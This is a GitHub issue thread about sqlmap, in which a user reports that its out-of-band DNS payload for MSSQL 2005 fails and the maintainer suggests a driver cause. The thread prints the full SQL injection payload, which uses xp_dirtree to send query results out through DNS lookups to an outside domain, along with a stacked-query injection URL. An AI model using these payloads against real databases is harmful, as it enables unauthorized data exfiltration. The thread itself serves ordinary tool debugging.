### ISSUE TITLE
out-of-band queries for MSSQL 2005 use invalid syntax.

### ISSUE THREAD

**Issue by frankyshells** [sqlmapproject/sqlmap#2848]
I'm using version 1.1.11#stable.

when I execute the following command, I am expecting sqlmap to issue a SQL statement that will cause the target database server to make a DNS query.

sqlmap -u http://www.somdomain.com/file.asp --data ID=1 -p ID --dbs --dns-domain domain.com

the query that is sent to the target looks like:

`DECLARE @host varchar(1024); SELECT @host='sPw.'+(SELECT master.dbo.fn_varbintohexstr(CAST(SUBSTRING((ISNULL(CAST(7057 AS NVARCHAR(4000)),' ')),1,13) AS VARBINARY(8000))))+'.PNP.domain.com'; EXEC('master..xp_dirtree "\\'+@host+'\XNrG"')`

the above code fails with the error "Must declare the scalar variable @host".  The issue is resolved if you remove the semicolons between the statements

`DECLARE @host varchar(1024) SELECT @host='sPw.'+(SELECT master.dbo.fn_varbintohexstr(CAST(SUBSTRING((ISNULL(CAST(7057 AS NVARCHAR(4000)),' ')),1,13) AS VARBINARY(8000))))+'.PNP.domain.com' EXEC('master..xp_dirtree "\\'+@host+'\XNrG"')`

**Comment by stamparm** [comment]
Just to leave two references where semicolon is used in such cases:

http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

Have to try it (can do it later)

**Comment by stamparm** [comment]
@frankyshells could you please retry and/or debug what is going on in your setup. I am posting here an example where I couldn't reproduce this issue:

```
http://testasp.vulnweb.com/showforum.asp?id=0;DECLARE @host varchar(1024); SELECT @host--
```

**Comment by stamparm** [comment]
https://msdn.microsoft.com/en-us/library/ms143729%28v=sql.120%29.aspx:

"Deprecated Database Engine Features in SQL Server....":
...
"Not ending Transact-SQL statements with a semicolon"

p.s. hence, I am not sure that I can make this change inside sqlmap without further debugging (on your side) what is going on

**Comment by frankyshells** [comment]
I think this may be related to the JDBC driver in use.  jTDS throws the before mentioned error, even when the query is run directly through an tool like dbVis, 

![image](https://user-images.githubusercontent.com/32338589/34415354-d569743c-ebb3-11e7-9016-ecfb7b106de6.png)

The query runs fine when using the standard Microsoft native client.

![image](https://user-images.githubusercontent.com/32338589/34415343-baea44a6-ebb3-11e7-85f4-3bea925d1905.png)

both the queries in the above images are against the same 2005 SQL Server.  Same server, same query, different results.  I think it is likely an issue w/ the JDBC driver.

**Comment by stamparm** [comment]
Hence, I am not sure whether there is something to fix here. I would not like to remove those semi-colons (`;`) as this kind of syntax should be invalid/unacceptable by the newer versions of SQL Server
